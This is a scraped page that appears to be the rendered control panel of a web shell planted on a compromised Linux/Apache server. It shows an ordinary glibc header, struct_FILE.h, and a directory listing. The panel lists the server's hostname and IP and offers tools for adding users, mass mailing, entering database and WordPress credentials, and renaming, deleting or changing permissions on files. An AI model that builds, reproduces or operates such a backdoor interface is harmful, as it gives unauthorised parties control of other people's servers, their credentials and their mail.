System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
bits
/
types
/
216.73.216.122
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
struct_FILE.h
/* Copyright (C) 1991-2018 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef __struct_FILE_defined #define __struct_FILE_defined 1 /* Caution: The contents of this file are not part of the official stdio.h API. However, much of it is part of the official *binary* interface, and therefore cannot be changed. */ #if defined _IO_USE_OLD_IO_FILE && !defined _LIBC # error "_IO_USE_OLD_IO_FILE should only be defined when building libc itself" #endif #if defined _IO_lock_t_defined && !defined _LIBC # error "_IO_lock_t_defined should only be defined when building libc itself" #endif #include <bits/types.h> struct _IO_FILE; struct _IO_marker; struct _IO_codecvt; struct _IO_wide_data; /* During the build of glibc itself, _IO_lock_t will already have been defined by internal headers. */ #ifndef _IO_lock_t_defined typedef void _IO_lock_t; #endif /* The tag name of this struct is _IO_FILE to preserve historic C++ mangled names for functions taking FILE* arguments. That name should not be used in new code. */ struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ /* The following pointers correspond to the C++ streambuf protocol. */ char *_IO_read_ptr; /* Current read pointer */ char *_IO_read_end; /* End of get area. */ char *_IO_read_base; /* Start of putback+get area. */ char *_IO_write_base; /* Start of put area. */ char *_IO_write_ptr; /* Current put pointer. */ char *_IO_write_end; /* End of put area. */ char *_IO_buf_base; /* Start of reserve area. */ char *_IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ char *_IO_save_base; /* Pointer to start of non-current get area. */ char *_IO_backup_base; /* Pointer to first valid character of backup area */ char *_IO_save_end; /* Pointer to end of non-current get area. */ struct _IO_marker *_markers; struct _IO_FILE *_chain; int _fileno; int _flags2; __off_t _old_offset; /* This used to be _offset but it's too small. */ /* 1+column number of pbase(); 0 is unknown. */ unsigned short _cur_column; signed char _vtable_offset; char _shortbuf[1]; _IO_lock_t *_lock; #ifdef _IO_USE_OLD_IO_FILE }; struct _IO_FILE_complete { struct _IO_FILE _file; #endif __off64_t _offset; /* Wide character stream stuff. */ struct _IO_codecvt *_codecvt; struct _IO_wide_data *_wide_data; struct _IO_FILE *_freeres_list; void *_freeres_buf; size_t __pad5; int _mode; /* Make sure we don't get into trouble again. */ char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)]; }; /* These macros are used by bits/stdio.h and internal headers. */ #define __getc_unlocked_body(_fp) \ (__glibc_unlikely ((_fp)->_IO_read_ptr >= (_fp)->_IO_read_end) \ ? __uflow (_fp) : *(unsigned char *) (_fp)->_IO_read_ptr++) #define __putc_unlocked_body(_ch, _fp) \ (__glibc_unlikely ((_fp)->_IO_write_ptr >= (_fp)->_IO_write_end) \ ? __overflow (_fp, (unsigned char) (_ch)) \ : (unsigned char) (*(_fp)->_IO_write_ptr++ = (_ch))) #define _IO_EOF_SEEN 0x0010 #define __feof_unlocked_body(_fp) (((_fp)->_flags & _IO_EOF_SEEN) != 0) #define _IO_ERR_SEEN 0x0020 #define __ferror_unlocked_body(_fp) (((_fp)->_flags & _IO_ERR_SEEN) != 0) #define _IO_USER_LOCK 0x8000 /* Many more flag bits are defined internally. */ #endif
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-07 11:00:59
..
DIR
-
drwxr-xr-x
2025-08-07 11:00:59
FILE.h
text/x-c
180 B
-rw-r--r--
2025-08-05 02:01:05
__FILE.h
text/x-c
110 B
-rw-r--r--
2025-08-05 02:01:05
__fpos64_t.h
text/x-c
410 B
-rw-r--r--
2025-08-05 02:01:05
__fpos_t.h
text/x-c
381 B
-rw-r--r--
2025-08-05 02:01:05
__locale_t.h
text/x-c
1.68 KB
-rw-r--r--
2025-08-05 02:00:57
__mbstate_t.h
text/plain
564 B
-rw-r--r--
2025-08-05 02:01:06
__sigset_t.h
text/plain
206 B
-rw-r--r--
2025-08-05 02:01:05
__sigval_t.h
text/x-c
1.12 KB
-rw-r--r--
2025-08-05 02:01:05
clock_t.h
text/x-c
143 B
-rw-r--r--
2025-08-05 02:01:07
clockid_t.h
text/x-c
174 B
-rw-r--r--
2025-08-05 02:01:07
cookie_io_functions_t.h
text/x-c
2.66 KB
-rw-r--r--
2025-08-05 02:01:05
error_t.h
text/plain
893 B
-rw-r--r--
2025-08-05 02:01:05
locale_t.h
text/x-c
982 B
-rw-r--r--
2025-08-05 02:00:57
mbstate_t.h
text/x-c
135 B
-rw-r--r--
2025-08-05 02:01:06
res_state.h
text/x-c
1.96 KB
-rw-r--r--
2025-08-05 02:01:27
sig_atomic_t.h
text/x-c
272 B
-rw-r--r--
2025-08-05 02:01:05
sigevent_t.h
text/x-c
1.18 KB
-rw-r--r--
2025-08-05 02:01:05
siginfo_t.h
text/x-c
3.79 KB
-rw-r--r--
2025-08-05 02:01:05
sigset_t.h
text/x-c
195 B
-rw-r--r--
2025-08-05 02:01:05
sigval_t.h
text/x-c
599 B
-rw-r--r--
2025-08-05 02:01:05
stack_t.h
text/x-c
1.04 KB
-rw-r--r--
2025-08-05 02:01:05
struct_FILE.h
text/x-c
4.01 KB
-rw-r--r--
2025-08-05 02:01:05
struct_iovec.h
text/x-c
1.04 KB
-rw-r--r--
2025-08-05 02:01:07
struct_itimerspec.h
text/x-c
288 B
-rw-r--r--
2025-08-05 02:01:07
struct_osockaddr.h
text/x-c
274 B
-rw-r--r--
2025-08-05 02:01:08
struct_rusage.h
text/x-c
3.98 KB
-rw-r--r--
2025-08-05 02:01:07
struct_sched_param.h
text/x-c
1.05 KB
-rw-r--r--
2025-08-05 02:01:07
struct_sigstack.h
text/x-c
1.05 KB
-rw-r--r--
2025-08-05 02:01:05
struct_statx.h
text/x-c
1.85 KB
-rw-r--r--
2025-08-05 02:01:07
struct_statx_timestamp.h
text/x-c
1.17 KB
-rw-r--r--
2025-08-05 02:01:07
struct_timespec.h
text/x-c
376 B
-rw-r--r--
2025-08-05 02:01:07
struct_timeval.h
text/x-c
287 B
-rw-r--r--
2025-08-05 02:01:07
struct_tm.h
text/x-c
760 B
-rw-r--r--
2025-08-05 02:01:07
time_t.h
text/x-c
138 B
-rw-r--r--
2025-08-05 02:01:07
timer_t.h
text/x-c
159 B
-rw-r--r--
2025-08-05 02:01:07
wint_t.h
text/plain
796 B
-rw-r--r--
2025-08-05 02:01:06
~ ACUPOFTEA - mail.ontime-ae.com